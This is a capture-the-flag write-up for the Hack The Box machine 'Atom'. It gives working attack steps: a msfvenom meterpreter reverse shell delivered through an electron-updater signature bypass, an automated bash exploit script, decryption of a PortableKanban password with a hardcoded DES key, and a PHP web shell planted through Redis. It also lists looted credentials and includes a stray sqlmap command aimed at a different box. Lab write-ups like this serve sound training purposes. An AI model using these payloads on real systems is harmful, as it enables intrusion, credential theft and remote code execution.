![](img/Pasted%20image%2020210417152011.png)

So  this was a pain in the as when the box was getting hammered so couldnt get a proper scan going . So decide to take a nap and come back later. I Started off the box with a quick scan of all ports then going back in scanning the service versions 
```Bash
ports=$(nmap -p- --min-rate=1000  -T4 10.10.10.237 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.10.10.237 -oA nmap-all-tcp
```
![](img/Pasted%20image%2020210418044004.png)

A few things stood out bsides the wbesite on 80, winrm was open, redis was open and possibly shares open , so tried to scan for share files after seeing *Software_Updates* folder

```
smbclient -L 10.10.10.237  
smbclient //10.10.10.237/Software_Updates
```                                                   

![](img/Pasted%20image%2020210417211905.png)

![](img/Pasted%20image%2020210417212259.png)

Just a pdf? 
![](img/Pasted%20image%2020210418025759.png)
So in the PDF it had some info , so I googled https://www.google.com/search?q=electron-builder+exploit and found this blog post from a few months ago.
https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html

# DEMO VM
So on the website, it offered a download, it was a custom electron app, so lets spin up a Win10 VM and check it out. (admittedly i screwed up initially in my hurry to see what the app was doing , and failed to add updates.atom.htb pointing to 127.0.0.1 in my hosts file) I spent way too much time trying to get the demo to work, by not putting in the hostname the app fails to resolve and wont try to grab the latest.yml . Electron is nice because you can proxy it through burp to se what it's doing, I learned this trick while doing the Unobtainium htb box.

![](img/Pasted%20image%2020210418221237.png)

So in the doyensec article it mentions using a single quote in a file name because the path in the ${tempUpdateFile} variable its looking for is unquoted. 
So ended up trying to use a simple exe payload using msfvenom

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.177 LPORT=4444 -f exe -o "/home/kali/Desktop/r's.exe"
```
Once the file was created we followed the blog article to then get a sha512 sum of the file 
```
shasum -a 512 "r's.exe" | cut -d " " -f1 | xxd -r -p | base64                                                   
lMx/w3oUnyX0gUFIqQe4QH4iZMDenxGbulBKrERpK+LPJcCRpgsp4UlkuxlCwN+jsxD8qQYg2cme6RniJo4szw==
```
Then we craft a latest.yml

latest.yml
```
version: 1.2.3
files:
path: http://10.10.14.177/r's.exe
sha512: lMx/w3oUnyX0gUFIqQe4QH4iZMDenxGbulBKrERpK+LPJcCRpgsp4UlkuxlCwN+jsxD8qQYg2cme6RniJo4szw==
```
# Foothold 
I also automated this making a bash script, chmod it , opened a meterpreter listener in another console, then executed it
```bash
IP=(`ifconfig tun0| grep -w inet | awk '{print $2}'`)
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST '$IP';set ExitOnSession false;exploit -j -z"
```
atom.sh
```bash
IP=`ifconfig tun0| grep -w inet | awk '{print $2}'`
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=4444 -f exe -o "r's.exe"
KEY=`shasum -a 512 "r's.exe" | cut -d " " -f1 | xxd -r -p | base64 -w 0`
cat <<EOF >> latest.yml
version: 1.2.3
path: http://$IP/r's.exe
sha512: $KEY
EOF
smbclient //10.10.10.237/Software_Updates/  -U " "%" "  -c "cd client2;put latest.yml"
python3 -m http.server 80
```
Basically the script creates a meterpreter payload, then gets the sha512 sum , creates the .yml file, uses smbclient to upload it , then starts a python HTTP listener. If all went well you should first see a connection in the Python listener, 
![](img/Pasted%20image%2020210418024451.png)

then a connection to metasploit 

![](img/Pasted%20image%2020210418024307.png)
# User
We have privs as jason , who also has the user.txt on his desktop

![](img/Pasted%20image%2020210418025622.png)
![](img/Pasted%20image%2020210418025555.png)


# Root
So I found there was 2 ways to escalate, one way gave you Administrator privs, the second gave you SYSTEM privs. 

Doing Recon checking the running processes I saw Redis running, (which also had the open port earlier in nmap scan) I googled around for redis password location and was happy to find its stored in a conf file. Using that password I logged in with redis -cli.exe
![](img/Pasted%20image%2020210418031137.png)


```bash
redis-cli.exe -a kidvscat_yes_kidvscat

select 0
    OK
keys *
    pk:ids:MetaDataClass
    pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
    pk:ids:User
    pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff
get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
    {"Id":"e8e29158d70d44b1a1ba4949d52790a0","Name":"Administrator","Initials":"","Email":"","EncryptedPassword":"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi","Role":"Admin","Inactive":false,"TimeStamp":637530169606440253}
```

![](img/Pasted%20image%2020210418033445.png)

This gave us an encrypted password. `Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi`
Trying to figure out what the password was from I ended up going n a log recon of the box looking for clues, finally realizing Jason had something in his downloads folder called PortableKanban

![](img/Pasted%20image%2020210418035253.png)

which I read by googling used Redis to store its data, I also so an [exploit-db article](https://www.exploit-db.com/exploits/49409) on how to decrypt the passwords , unfortunately there was no .pk3 file because it was presumably installed with using the Redis option instead of the local db file option.  So I mangled the exploit-db script to just feed the password directly instead of a pk3 file.

![](img/Pasted%20image%2020210418041017.png)
decrypt.py
```Python
import json
import base64
from des import * #python3 -m pip install des
import sys

def decode(hash):
        hash = base64.b64decode(hash.encode('utf-8'))
        key = DesKey(b"7ly6UznJ")
        return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8')

print("{}:{}".format("Administrator",decode("Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi")))
```
![](img/Pasted%20image%2020210418041617.png)

Knowing the WinRM port was open from earlier nmap scan I used evil-winrrm to connect to port 5985

![](img/Pasted%20image%2020210417234810.png)
```
evil-winrm -i <ip> -u 'administrator' -p 'kidvscat_admin_@123'
Password extracted from Redis server.
Hash = Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi
Exploit used to decrypt:
https://www.exploit-db.com/exploits/49409
Password = kidvscat_admin_@123
```

![](img/Pasted%20image%2020210418042047.png)

![](img/Pasted%20image%2020210418041833.png)

Just for the hell of it I also used mimikatz to get Jason's plaintext password 

![](img/Pasted%20image%2020210418062449.png)

# SYSTEM
You can also get system privileges by creating a file through Redis thats saved in the Xampp directory, since Xampp running as system
```
c:\Program Files\Redis>redis-cli.exe -a kidvscat_yes_kidvscat
redis-cli.exe -a kidvscat_yes_kidvscat
config set dir C:\xampp\htdocs\
OK
config set dbfilename illwill.php
OK
set test "<?php system($_REQUEST['cmd']); ?>" 
OK
save
OK
```

![](img/Pasted%20image%2020210418060857.png)
![](img/Pasted%20image%2020210418230240.png)

#### SQLmap
```sqlmap --url "http://cacti-admin.monitors.htb/cacti/color.php?action=export&header=false&filter=1" --threads 10 --batch  --dbs --cookie="Cacti=oqmvqvlkpfe6knbp5vf82ja5bj; cacti_remembers=admin%2Cc281b9e13f513b7ffd438dca7cda9495fc7d29326191fba14c48bf92debcaa02; cross-site-cookie=bar"
```

```sqlmap --url "http://cacti-admin.monitors.htb/cacti/color.php?action=export&header=false&filter=1" --threads 10 --batch  --dbs --cookie="Cacti=oqmvqvlkpfe6knbp5vf82ja5bj; cacti_remembers=admin%2Cc281b9e13f513b7ffd438dca7cda9495fc7d29326191fba14c48bf92debcaa02; cross-site-cookie=bar"
```

![](img/Pasted%20image%2020210424201222.png)
# LOOT
- Redis: kidvscat_yes_kidvscat
- Administrator:kidvscat_admin_@123
- jason:kidvscat_electron_@123
- root.txt - 7560450ddb0b358632adc7cb3ae3d9ad
- user.txt - c4448f09f05246b057b66a8aa01abf43

# References
- https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html
- https://book.hacktricks.xyz/pentesting/6379-pentesting-redis
- https://www.exploit-db.com/exploits/49409
